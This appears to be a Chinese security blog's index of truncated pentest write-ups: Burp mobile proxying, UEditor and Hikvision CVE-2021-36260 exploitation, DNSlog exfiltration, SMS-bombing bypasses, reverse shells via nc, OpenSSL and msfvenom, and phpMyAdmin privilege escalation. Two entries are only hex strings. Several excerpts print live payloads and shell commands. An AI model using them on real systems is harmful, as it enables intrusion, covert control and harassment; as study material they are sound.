一次burp无法抓微信PC端小程序的头疼经历以及解决方案
今天想用burp对PC的微信小程序进行渗透测试,发现怎么抓也抓不到,明明之前可以抓的,经过几小时的研究和资料搜集,终于解决。顺手把如何对手机/模拟器进行抓包也写了下,在文末我会提到是如何解决这个头疼且深刻的问题,这个问题我相信大家应该都会有,希望能帮助到大家。
一、抓手机/模拟器的微信公众号、小程序、APP前提:保证电脑和手机在同一局域网
(1)初阶电脑端使用ipconfig查看当前IP地址
手机端打开WLAN设置,手动指定代理,代理IP地址为电脑端的IP地址例如上面的192.168.43.170,端口设置为例如8081
此时打开burp,设置监听(非本地回环地址)
此时,burp就能抓手机访问网页的包了。
但是对于一些HTTPS的站点,手机访问会弹出警告——证书不受信任
点击确定继续后,burp才可以抓到该数据包
(2)进阶上面的方法很快就能用手机进行渗透测试,但是有一个问题:对HTTPS站点的渗透很繁琐甚至无效,以及对微信公众号(抓不全)和小程序会出现抓不到包、无法抓取app的情况。在手机导入一个burp证书即可
手机设置好代理后,访问http://burp 下载证书,下 ...
Ueditor编辑器任意文件上传漏洞
一、漏洞描述UEditor是一款所见即所得的开源富文本编辑器,具有轻量、可定制、用户体验优秀等特点,被广大WEB应用程序所使用。本次爆出的高危漏洞属于.NET版本,其它的版本暂时不受影响。漏洞成因是在抓取远程数据源的时候未对文件后缀名做验证导致任意文件写入漏洞,黑客利用此漏洞可以在服务器上执行任意指令,综合评级高危。
二、影响范围该漏洞影响UEditor的.Net版本,其它语言版本暂时未受影响。
三、漏洞原理漏洞的成因是在获取图片资源时仅检查了Content-Type,导致可以绕过达到任意文件上传。具体的漏洞分析可参考:https://www.freebuf.com/vuls/181814.html
四、漏洞复现1、环境部署准备一台Windows Server服务器,我用的是Windows 2008 Server。
没有安装.NET Framework 4.0的要先安装:http://www.microsoft.com/zh-cn/download/details.aspx?id=17718
安装完 .NET Framework 4.0 后,还需要向 IIS 注册应用程序池,注册的方法 ...
海康威视远程命令执行漏洞(CVE-2021-36260)
一、前言作为HW2022的防守方,发现一IP频繁对我方资产进行扫描,遂进行溯源
二、漏洞概述攻击者利用该漏洞可以用无限制的 root shell 来完全控制设备,即使设备的所有者受限于有限的受保护 shell(psh)。除了入侵 IP 摄像头外,还可以访问和攻击内部网络。
该漏洞的利用并不需要用户交互,攻击者只需要访问 http 或 HTTPS 服务器端口(80/443)即可利用该漏洞,无需用户名、密码、以及其他操作。摄像头本身也不会检测到任何登录信息。
三、溯源过程定位攻击IP与搜索威胁情报,发现是恶意IP
Fofa空间搜索引擎发现该IP开放了82端口
访问发现是HIKVISION的登录界面
漏洞点位于:/SDK/webLanguage,利用PUT方法上传xml数据:
<?xml version='1.0' encoding='utf-8'?><language>$(Command > webLib/x)</language>
再去请求路径:/x,发现命令已经执行成功
使用EXP成功拿下该摄 ...
DNSlog平台的搭建
一、DNSlog简介在某些情况下,无法利用漏洞获得回显。但是,如果目标可以发送DNS请求,则可以通过DNS log方式将想获得的数据外带出来(oob)。
DNS log常用于以下情况:
SQL盲注
无回显的命令执行
无回显的SSRF
二、搭建DNS log平台1、前期准备一台VPS
1.x.x.x
一个域名
wolke.cn
在wolke.cn中添加添加一个A记录与一个NS记录。其中A记录指向服务器IP地址,NS记录指向A记录的域名地址
2、项目部署参考开源项目DNSlog-GO:https://github.com/lanyi1998/DNSlog-GO
该项目是由GO语言编写的,所以部署的时候需要用到GO语言的环境
DNS使用的是53(UDP)端口,记得53端口的放行
配置文件config.yaml的修改(我这里HTTP采用的是8000端口,也记得要放行)
启动
3、测试访问http://ip:8000
需要输入token,这里的token就是config.yaml设置的值
点击复制随机子域名获取到 8xek8.dnslog.wolke. ...
关于验证码的那些漏洞
最近看到十二师傅写了篇关于验证码漏洞的文章,觉得总结得很好,也学到了一些新思路,让我受益匪浅,原文链接:
https://www.yuque.com/shier-mfbht/qh4bgb/zcee3k
一、短信轰炸这类漏洞存在的原因是没有对短信验证码的发送时间、用户及其IP作一些限制。
1、正常的短信轰炸
burp一直发包即可
2、并发绕过做了限制咋办?可以试试并发(万物皆可并发)
使用turbo intruder插件进行并发。
并发次数越大是不是轰炸就越多
3、删除Cookie绕过
可以尝试把cookie删掉,有些开发就可能根据cookie判断验证码是否获取过
4、特殊格式绕过
手机号码前后加空格,86,086,0086,+86,0,00,/r,/n, 以及特殊符号等
修改cookie,变量,返回
138888888889 12位经过短信网关取前11位,导致短信轰炸
进行能解析的编码。
二、暴力破解(任意用户登录注册)服务端未对验证时间、次数作出限制,存在爆破的可能性。简单的系统存在可以直接爆破的可能性,但做过一些防护的系统还得进行一些绕过才能进行爆破。 ...
2022年5-6月总结(第二期)
a49ebe72edd3a5480763960bc71b9af388fa5fe5dabe196401bf3dd7a90d1578e335dd6eb3e8dfe21d8aa9f0887efaec87a250eea860b4b4e6bbbe8209d007a5032fe3e4119c7812f26f0e091b806d5c3ced43baaa8f9a54d14e19e1c4fb22f38afa35d205302ac0095f5162ab624c0830465caf369779383df2b86f45b189a2cb7feb5edba668e96bcfae5a33636d86da9adb0375bac260a4def04dc1b5f67b0694ebc4b0af90c6cc00c5ac7ed81b17cc17400da7b86b47b7dd185d79389f680f9c6a34227ec2d5b1ed372aa16e8ea6fb5b14253cf2c127e87345281ea73bbf84dbe0dcd2db150484f6d58e353e7cacaa8dc52120d962ba6 ...
OpenSSL反弹加密Shell
一、前言在进行红队渗透测试的后渗透阶段为了进一步横行渗透往往需要反弹 shell,这里列出了使用各种语言进行反弹 shell 的方法,我发现这种反弹 shell 方式都有一个缺点,那就是所有的流量都是明文传输的。
我们使用 nc 反弹 shell 进行测试
Kali: nc -lvp 4444Win7: nc 192.168.1.6 4444 -e cmd
使用 wireshark 可以直接看到我们执行的命令和返回信息
在这种情况下当我们进行操作时,网络防御检测系统(IDS、IPS等)会获取到我们的通信内容并进行告警和阻止,因此需要对通信内容进行混淆或加密,这时可以选择使用 OpenSSL 反弹一个加密 shell。
二、OpenSSL简介在计算机网络上,OpenSSL 是一个开放源代码的软件库包,应用程序可以使用这个包来进行安全通信,避免窃听,同时确认另一端连接者的身份
利用 OpenSSL 反弹 shell 之前需要生成自签名证书
三、使用OpenSSL生成自签名证书openssl req -x509 -newkey rsa:2048 -keyout key.pem -o ...
使用Kali进行内网渗透
一、网络拓扑图假如我们拿到了一台主机比如Win2008的shell,如何通过该主机进行内网渗透,拿到比如下图中数据服务器的最高权限?
二、Win2008主机上线msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.6 lport=4444 -f exe > /var/www/html/w01ke.exemsfconsoleuse exploit/multi/handlerset payload windows/meterpreter/reverse_tcpset lhost 192.168.0.196ser lport 4444exploit
三、简单信息收集信息收集之前可以输入help了解一下meterpreter下的命令,其中有信息收集,提权等多个模块,自行了解
(1)查看目标主机当前用户与权限meterpreter > getuid
(2)查看目标主机系统相关信息meterpreter> sysinfo
(3)查看目标主机路由表meterpreter > route
(4) ...
2022年3-4月总结(第01期)
2eeb050562cfb6091eb6af2e3dfa5fc4436960303193f7059af77b82d2af81c51b1113ce3cb0b49f31a063adc4c47eee32dd7d77666da8889290729d8bd768cdaea8af42462e137ea790187d76de0c138fdd2a1a137ae9c4e2fc72a5fc16390f13378c155928880ff887b7da7f6c78265e4d0154a3a1a198348c359e750aecea5f43da18f1710b78df9760a3b2903ede868bd99de42537090a829c1c5390469797744237e7dbd5fe5357b8c387abe3a1e3527882b2f213ec96e45e94674ef07cf459cff4e8e2e5d5a3fb61d1501d9123abef74ad535ee71255fd35e7c4f85c68846884ec12fa5e8d51905dd70ab492e2cb0a7e76de4597368 ...
phpMyAdmin提权
一、条件
能成功登录到phpMyAdmin里去
有读、写、执行的权限
知道网站的绝对路径
二、操作步骤1、爆数据库安装路径(1)SQL语句查询SHOW GLOBAL VARIABLES LIKE "%datadir%";select @@basedir;
因为phpstudy是集成环境,所以网站物理路径是D:\phpstudy_pro\WWW
(2)敏感文件直接在url后面输入phpinfo.php,看看能不能读出这个文件,如果存在就会把网站的绝对路径显示出来,这样的情况特少,因为网站管理人员不可能把这个测试页面在互联网上面直接显示出来,他们或许会更改路径或许会设置目录访问权限;
(3)扫描网站使用扫描工具对网站进行扫扫描;扫描一些phpinfo.php info.php php.php test.php等等;
(4)读取配置文件
Windows2003 IIS 6
C:\Windows/system32\inetsrv\metabase.xml
Win2008/2012 IIS 7.5
C:\Windows\System32\inetsrv\con ...